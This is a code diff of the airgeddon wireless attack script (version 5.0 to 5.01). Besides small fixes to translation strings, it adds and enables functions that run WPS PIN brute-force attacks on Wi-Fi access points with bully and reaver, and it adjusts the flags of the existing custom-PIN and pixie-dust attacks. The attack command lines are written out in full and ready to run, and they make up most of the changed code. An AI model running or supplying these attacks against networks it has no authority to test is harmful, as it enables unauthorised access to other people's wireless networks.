@@ -1,6 +1,6 @@
 #!/bin/bash
 
-airgeddon_version="5.0"
+airgeddon_version="5.01"
 
 #Enabled 1 / Disabled 0 - Debug mode for faster development skipping intro and initial checks - Default value 0
 debug_mode=0
@@ -2366,10 +2366,10 @@ function language_strings() {
 
 	arr["ENGLISH",236]="Hashcat trophy file generated successfully at [${normal_color}${potenteredpath}${blue_color}]"
 	arr["SPANISH",236]="Fichero de trofeo hashcat generado con éxito en [${normal_color}${potenteredpath}${blue_color}]"
-	arr["FRENCH",236]="Le fichier trophée Hashcat a bien été crée dans [${normal_color}${potenteredpath}${blue_color}]"
+	arr["FRENCH",236]="Le fichier trophée hashcat a bien été crée dans [${normal_color}${potenteredpath}${blue_color}]"
 	arr["CATALAN",236]="Fitxer de trofeu hashcat generat amb èxit a [${normal_color}${potenteredpath}${blue_color}]"
-	arr["PORTUGUESE",236]="Arquivo troféu Hashcat gerado com sucesso [${normal_color}${potenteredpath}${blue_color}]"
-	arr["RUSSIAN",236]="Трофейный файл Hashcat был успешно сгенерирован в [${normal_color}${potenteredpath}${blue_color}]"
+	arr["PORTUGUESE",236]="Arquivo troféu hashcat gerado com sucesso [${normal_color}${potenteredpath}${blue_color}]"
+	arr["RUSSIAN",236]="Трофейный файл hashcat был успешно сгенерирован в [${normal_color}${potenteredpath}${blue_color}]"
 	arr["GREEK",236]="Το hashcat αρχείο τρόπαιο δημιουργήθηκε επιτυχώς [${normal_color}${potenteredpath}${blue_color}]"
 
 	arr["ENGLISH",237]="5.  Lowercase + uppercase + numeric + symbol chars"
@@ -4289,7 +4289,7 @@ function exec_wps_custom_pin_bully_attack() {
 	language_strings "${language}" 366 "blue"
 	language_strings "${language}" 4 "read"
 	recalculate_windows_sizes
-	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS custom pin bully attack" -e "bully ${interface} -b ${wps_bssid} -c ${wps_channel} -L --force -B -p ${custom_pin} -v ${bully_verbosity} && echo \"Close this window\"" > /dev/null 2>&1
+	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS custom pin bully attack" -e "bully ${interface} -b ${wps_bssid} -c ${wps_channel} -L -F -B -p ${custom_pin} -v ${bully_verbosity} && echo \"Close this window\"" > /dev/null 2>&1
 }
 
 #Execute wps custom pin reaver attack
@@ -4303,7 +4303,7 @@ function exec_wps_custom_pin_reaver_attack() {
 	language_strings "${language}" 366 "blue"
 	language_strings "${language}" 4 "read"
 	recalculate_windows_sizes
-	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS custom pin reaver attack" -e "reaver -i ${interface} -b ${wps_bssid} -c ${wps_channel} -L -f -n -p ${custom_pin} -vvv && echo \"Close this window\"" > /dev/null 2>&1
+	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS custom pin reaver attack" -e "reaver -i ${interface} -b ${wps_bssid} -c ${wps_channel} -L -f -n -p ${custom_pin} -a -g 1 -vvv && echo \"Close this window\"" > /dev/null 2>&1
 }
 
 #Execute bully pixie dust attack
@@ -4332,6 +4332,34 @@ function exec_reaver_pixiewps_attack() {
 	language_strings "${language}" 4 "read"
 	recalculate_windows_sizes
 	xterm -hold -bg black -fg red -geometry "${g2_stdright_window}" -T "WPS reaver pixie dust attack" -e "reaver -i ${interface} -b ${wps_bssid} -c ${wps_channel} -K 1 -vvv && echo \"Close this window\"" > /dev/null 2>&1
+}
+
+#Execute wps bruteforce pin bully attack
+function exec_wps_bruteforce_pin_bully_attack() {
+
+	echo
+	language_strings "${language}" 32 "green"
+
+	echo
+	language_strings "${language}" 33 "yellow"
+	language_strings "${language}" 366 "blue"
+	language_strings "${language}" 4 "read"
+	recalculate_windows_sizes
+	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS bruteforce pin bully attack" -e "bully ${interface} -b ${wps_bssid} -c ${wps_channel} -L -F -B -v ${bully_verbosity} && echo \"Close this window\"" > /dev/null 2>&1
+}
+
+#Execute wps bruteforce pin reaver attack
+function exec_wps_bruteforce_pin_reaver_attack() {
+
+	echo
+	language_strings "${language}" 32 "green"
+
+	echo
+	language_strings "${language}" 33 "yellow"
+	language_strings "${language}" 366 "blue"
+	language_strings "${language}" 4 "read"
+	recalculate_windows_sizes
+	xterm -hold -bg black -fg red -geometry "${g2_stdleft_window}" -T "WPS bruteforce pin reaver attack" -e "reaver -i ${interface} -b ${wps_bssid} -c ${wps_channel} -L -f -n -a -vvv && echo \"Close this window\"" > /dev/null 2>&1
 }
 
 #Execute mdk3 deauth DoS attack
@@ -4559,8 +4587,8 @@ function wps_custom_pin_parameters() {
 	return 0
 }
 
-#Validate pixie dust parameters
-function wps_pixie_dust_parameters() {
+#Validate wps pixie dust and bruteforce parameters
+function wps_pixie_dust_and_bruteforce_parameters() {
 
 	check_monitor_enabled
 	if [ "$?" != "0" ]; then
@@ -5172,8 +5200,8 @@ function wps_attacks_menu() {
 	language_strings "${language}" 357 reaver_attacks_dependencies[@]
 	language_strings "${language}" 346 bully_pixie_dust_attack_dependencies[@]
 	language_strings "${language}" 358 reaver_pixie_dust_attack_dependencies[@]
-	language_strings "${language}" 347 "under_construction" #bully_attacks_dependencies[@]
-	language_strings "${language}" 359 "under_construction" #reaver_attacks_dependencies[@]
+	language_strings "${language}" 347 bully_attacks_dependencies[@]
+	language_strings "${language}" 359 reaver_attacks_dependencies[@]
 	language_strings "${language}" 348 "under_construction" #bully_attacks_dependencies[@]
 	language_strings "${language}" 360 "under_construction" #reaver_attacks_dependencies[@]
 	print_simple_separator
@@ -5236,7 +5264,7 @@ function wps_attacks_menu() {
 					echo
 					language_strings "${language}" 368 "yellow"
 					language_strings "${language}" 115 "read"
-					wps_pixie_dust_parameters
+					wps_pixie_dust_and_bruteforce_parameters
 					if [ "$?" = "0" ]; then
 						exec_bully_pixiewps_attack
 					fi
@@ -5258,7 +5286,7 @@ function wps_attacks_menu() {
 					echo
 					language_strings "${language}" 370 "yellow"
 					language_strings "${language}" 115 "read"
-					wps_pixie_dust_parameters
+					wps_pixie_dust_and_bruteforce_parameters
 					if [ "$?" = "0" ]; then
 						exec_reaver_pixiewps_attack
 					fi
@@ -5274,7 +5302,12 @@ function wps_attacks_menu() {
 			if [ "$?" = "0" ]; then
 				forbidden_menu_option
 			else
-				under_construction_message
+				get_bully_version
+				set_bully_verbosity
+				wps_pixie_dust_and_bruteforce_parameters
+				if [ "$?" = "0" ]; then
+					exec_wps_bruteforce_pin_bully_attack
+				fi
 			fi
 		;;
 		10)
@@ -5282,7 +5315,11 @@ function wps_attacks_menu() {
 			if [ "$?" = "0" ]; then
 				forbidden_menu_option
 			else
-				under_construction_message
+				get_reaver_version
+				wps_pixie_dust_and_bruteforce_parameters
+				if [ "$?" = "0" ]; then
+					exec_wps_bruteforce_pin_reaver_attack
+				fi
 			fi
 		;;
 		11)
